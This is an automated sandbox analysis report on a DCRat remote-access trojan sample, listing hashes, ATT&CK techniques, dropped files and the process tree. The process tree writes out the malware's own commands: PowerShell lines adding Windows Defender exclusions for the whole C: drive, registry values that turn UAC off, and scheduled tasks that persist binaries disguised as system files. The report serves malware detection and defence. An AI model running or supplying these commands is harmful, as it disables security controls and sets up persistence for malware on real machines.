dcrat | 9f487d16cd0e0548b6bde75853d0cfcd4eb9362f61d101ce55740781e3e04b2d

Analysis

max time kernel
149s
max time network
153s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
14-10-2022 23:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1fb476576bd4aeb366aa82b6240ff2e8.exe
Size

4.9MB
MD5

1fb476576bd4aeb366aa82b6240ff2e8
SHA1

5ae8fba07122131f385bda0274967713d52057db
SHA256

9f487d16cd0e0548b6bde75853d0cfcd4eb9362f61d101ce55740781e3e04b2d
SHA512

360fcce899a22c55235078e3a72fe765fdedfeb9fc2effb3851dd629ea372440ca471dbe748a9e23ad41a3015c372f27a28c239c83abb186024b8c19026ebaa6
SSDEEP

49152:Dl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8E:

Score

10^/10

dcrat evasion infostealer rat spyware stealer trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1788	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1772	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	896	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1960	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1056	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1516	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1928	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1888	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	528	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1720	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1884	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1632	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1492	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1816	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1496	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	620	1332	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1164	1332	schtasks.exe

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

1fb476576bd4aeb366aa82b6240ff2e8.exelsm.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	1fb476576bd4aeb366aa82b6240ff2e8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	1fb476576bd4aeb366aa82b6240ff2e8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	1fb476576bd4aeb366aa82b6240ff2e8.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/900-55-0x000000001B880000-0x000000001B9AE000-memory.dmp	dcrat

Executes dropped EXE 1 IoCs

Processes:

lsm.exe

pid process

2164 lsm.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2164	lsm.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

1fb476576bd4aeb366aa82b6240ff2e8.exelsm.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1fb476576bd4aeb366aa82b6240ff2e8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	1fb476576bd4aeb366aa82b6240ff2e8.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsm.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ipinfo.io
7 ipinfo.io

flow	ioc
6	ipinfo.io
7	ipinfo.io

Drops file in Program Files directory 12 IoCs

Processes:

1fb476576bd4aeb366aa82b6240ff2e8.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows Defender\ja-JP\4ab0865cd715d1	1fb476576bd4aeb366aa82b6240ff2e8.exe
File opened for modification	C:\Program Files\Mozilla Firefox\fonts\RCX256F.tmp	1fb476576bd4aeb366aa82b6240ff2e8.exe
File opened for modification	C:\Program Files\Windows Portable Devices\lsm.exe	1fb476576bd4aeb366aa82b6240ff2e8.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\RCX3EFB.tmp	1fb476576bd4aeb366aa82b6240ff2e8.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\1fb476576bd4aeb366aa82b6240ff2e8.exe	1fb476576bd4aeb366aa82b6240ff2e8.exe
File created	C:\Program Files\Mozilla Firefox\fonts\886983d96e3d3e	1fb476576bd4aeb366aa82b6240ff2e8.exe
File created	C:\Program Files\Windows Portable Devices\lsm.exe	1fb476576bd4aeb366aa82b6240ff2e8.exe
File created	C:\Program Files\Windows Portable Devices\101b941d020240	1fb476576bd4aeb366aa82b6240ff2e8.exe
File created	C:\Program Files (x86)\Windows Defender\ja-JP\1fb476576bd4aeb366aa82b6240ff2e8.exe	1fb476576bd4aeb366aa82b6240ff2e8.exe
File opened for modification	C:\Program Files\Mozilla Firefox\fonts\csrss.exe	1fb476576bd4aeb366aa82b6240ff2e8.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCX3672.tmp	1fb476576bd4aeb366aa82b6240ff2e8.exe
File created	C:\Program Files\Mozilla Firefox\fonts\csrss.exe	1fb476576bd4aeb366aa82b6240ff2e8.exe

Drops file in Windows directory 4 IoCs

Processes:

1fb476576bd4aeb366aa82b6240ff2e8.exe

description	ioc	process
File created	C:\Windows\twain_32\sppsvc.exe	1fb476576bd4aeb366aa82b6240ff2e8.exe
File opened for modification	C:\Windows\twain_32\sppsvc.exe	1fb476576bd4aeb366aa82b6240ff2e8.exe
File created	C:\Windows\twain_32\0a1fd5f707cd16	1fb476576bd4aeb366aa82b6240ff2e8.exe
File opened for modification	C:\Windows\twain_32\RCX1CE6.tmp	1fb476576bd4aeb366aa82b6240ff2e8.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
1772	schtasks.exe
896	schtasks.exe
1960	schtasks.exe
1928	schtasks.exe
1888	schtasks.exe
1720	schtasks.exe
1056	schtasks.exe
528	schtasks.exe
1884	schtasks.exe
1492	schtasks.exe
1816	schtasks.exe
620	schtasks.exe
1788	schtasks.exe
1064	schtasks.exe
1632	schtasks.exe
1164	schtasks.exe
1516	schtasks.exe
1496	schtasks.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

1fb476576bd4aeb366aa82b6240ff2e8.exelsm.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
900	1fb476576bd4aeb366aa82b6240ff2e8.exe
2164	lsm.exe
1716	powershell.exe
1176	powershell.exe
1212	powershell.exe
1016	powershell.exe
984	powershell.exe
1752	powershell.exe
1040	powershell.exe
756	powershell.exe
588	powershell.exe
1848	powershell.exe
1568	powershell.exe
1788	powershell.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe
2164	lsm.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	900	1fb476576bd4aeb366aa82b6240ff2e8.exe
Token: SeDebugPrivilege	2164	lsm.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	984	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	756	powershell.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	1788	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

lsm.exe

pid process

2164 lsm.exe

pid	process
2164	lsm.exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

1fb476576bd4aeb366aa82b6240ff2e8.exelsm.exe

description	pid	process	target process
PID 900 wrote to memory of 1716	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1716	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1716	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1176	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1176	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1176	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1212	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1212	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1212	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1752	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1752	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1752	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 984	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 984	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 984	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1568	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1568	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1568	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1016	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1016	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1016	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 588	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 588	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 588	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 756	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 756	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 756	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1788	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1788	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1788	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1040	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1040	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1040	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1848	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1848	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 1848	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	powershell.exe
PID 900 wrote to memory of 2164	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	lsm.exe
PID 900 wrote to memory of 2164	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	lsm.exe
PID 900 wrote to memory of 2164	900	1fb476576bd4aeb366aa82b6240ff2e8.exe	lsm.exe
PID 2164 wrote to memory of 2468	2164	lsm.exe	WScript.exe
PID 2164 wrote to memory of 2468	2164	lsm.exe	WScript.exe
PID 2164 wrote to memory of 2468	2164	lsm.exe	WScript.exe
PID 2164 wrote to memory of 2496	2164	lsm.exe	WScript.exe
PID 2164 wrote to memory of 2496	2164	lsm.exe	WScript.exe
PID 2164 wrote to memory of 2496	2164	lsm.exe	WScript.exe

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

Processes:

1fb476576bd4aeb366aa82b6240ff2e8.exelsm.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	1fb476576bd4aeb366aa82b6240ff2e8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	1fb476576bd4aeb366aa82b6240ff2e8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	1fb476576bd4aeb366aa82b6240ff2e8.exe

C:\Users\Admin\AppData\Local\Temp\1fb476576bd4aeb366aa82b6240ff2e8.exe
"C:\Users\Admin\AppData\Local\Temp\1fb476576bd4aeb366aa82b6240ff2e8.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Program Files\Windows Portable Devices\lsm.exe
"C:\Program Files\Windows Portable Devices\lsm.exe"
2⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2164

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19eb6f94-9e36-4985-ae29-acfa51823c15.vbs"
3⤵
PID:2468

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aa544260-596b-4b13-9c18-812d28c1e8c2.vbs"
3⤵
PID:2496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Windows\twain_32\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\twain_32\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Windows\twain_32\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Mozilla Firefox\fonts\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\fonts\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Recovery\c11c4da2-1a8a-11ed-8505-e0b24281b398\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\c11c4da2-1a8a-11ed-8505-e0b24281b398\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\c11c4da2-1a8a-11ed-8505-e0b24281b398\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1fb476576bd4aeb366aa82b6240ff2e81" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\ja-JP\1fb476576bd4aeb366aa82b6240ff2e8.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1fb476576bd4aeb366aa82b6240ff2e8" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\ja-JP\1fb476576bd4aeb366aa82b6240ff2e8.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1fb476576bd4aeb366aa82b6240ff2e81" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Defender\ja-JP\1fb476576bd4aeb366aa82b6240ff2e8.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1164

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows Portable Devices\lsm.exe
Filesize
4.9MB

MD5
b3bd3634f06ffd5905ce77083b6a2ffa

SHA1
1a23aa90c11e22cb51b5e2f3ade1dbdd4d807e89

SHA256
4960c431516f1868d17026408e25f394dfedd5f867b568400e0a73d2d072ae02

SHA512
8a3987d814fd1d8d7b3f2a58d01af350eae34663af1fbe65bc4327dcfaaf6ad3320595ab9613526b68becf93de6e8e97425802f9cfc7fb41c87ceb9e1213bbfe

Download Submit
C:\Program Files\Windows Portable Devices\lsm.exe
Filesize
4.9MB

MD5
b3bd3634f06ffd5905ce77083b6a2ffa

SHA1
1a23aa90c11e22cb51b5e2f3ade1dbdd4d807e89

SHA256
4960c431516f1868d17026408e25f394dfedd5f867b568400e0a73d2d072ae02

SHA512
8a3987d814fd1d8d7b3f2a58d01af350eae34663af1fbe65bc4327dcfaaf6ad3320595ab9613526b68becf93de6e8e97425802f9cfc7fb41c87ceb9e1213bbfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\19eb6f94-9e36-4985-ae29-acfa51823c15.vbs
Filesize
725B

MD5
6fac94029d60df679bcf67f81c9d65d1

SHA1
c9ad7b62e602353ad4267661f5b4d06f7b45715c

SHA256
6baac14bb090dde15f37461cc4009946cc36570bb8766bbfd9731ced85a61251

SHA512
a147a26d76c7ef27c401d38e9b9c930716041ddf678c488f001f7b01ad9ade14a4df21ab9f69611ec4486b944aaafe81e2d2b8c0774d1588271a33a005c85f3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\aa544260-596b-4b13-9c18-812d28c1e8c2.vbs
Filesize
501B

MD5
6ec1973db2149417776844268c638b89

SHA1
ba950279c3f2ddf7a6388b5806f8f2716dfa9cea

SHA256
40e7f434294b8550b7ab10e10d4a0f354025a9eff612b6a58ff014d5788b579f

SHA512
1f4a46c02ea344f10b6f919b2fdea17f9e0b9541d21f86e70f59b8200f36914c768f2d0da41b7bfc5ec8e8a8af6ea6d368692810b0e9f1d6827bce67b0920c45

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9eb210dea74a7c209d6dcc638f4c5aff

SHA1
31801a32c4bcc478fc8023629e6358a2c49f1cae

SHA256
89dd5b39fcc8d6aec16afdec302d2d2594f4800aef2a3b8e55377e78cd2c18d5

SHA512
bddb308e9b9264bec7dfdd3d1fd7304794be1711e6b67a4f0463ae7c5630a81e8b58ee4eaf989edb49c6969f529438c479b916a99a5abc0b9057533b8383617c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9eb210dea74a7c209d6dcc638f4c5aff

SHA1
31801a32c4bcc478fc8023629e6358a2c49f1cae

SHA256
89dd5b39fcc8d6aec16afdec302d2d2594f4800aef2a3b8e55377e78cd2c18d5

SHA512
bddb308e9b9264bec7dfdd3d1fd7304794be1711e6b67a4f0463ae7c5630a81e8b58ee4eaf989edb49c6969f529438c479b916a99a5abc0b9057533b8383617c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9eb210dea74a7c209d6dcc638f4c5aff

SHA1
31801a32c4bcc478fc8023629e6358a2c49f1cae

SHA256
89dd5b39fcc8d6aec16afdec302d2d2594f4800aef2a3b8e55377e78cd2c18d5

SHA512
bddb308e9b9264bec7dfdd3d1fd7304794be1711e6b67a4f0463ae7c5630a81e8b58ee4eaf989edb49c6969f529438c479b916a99a5abc0b9057533b8383617c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
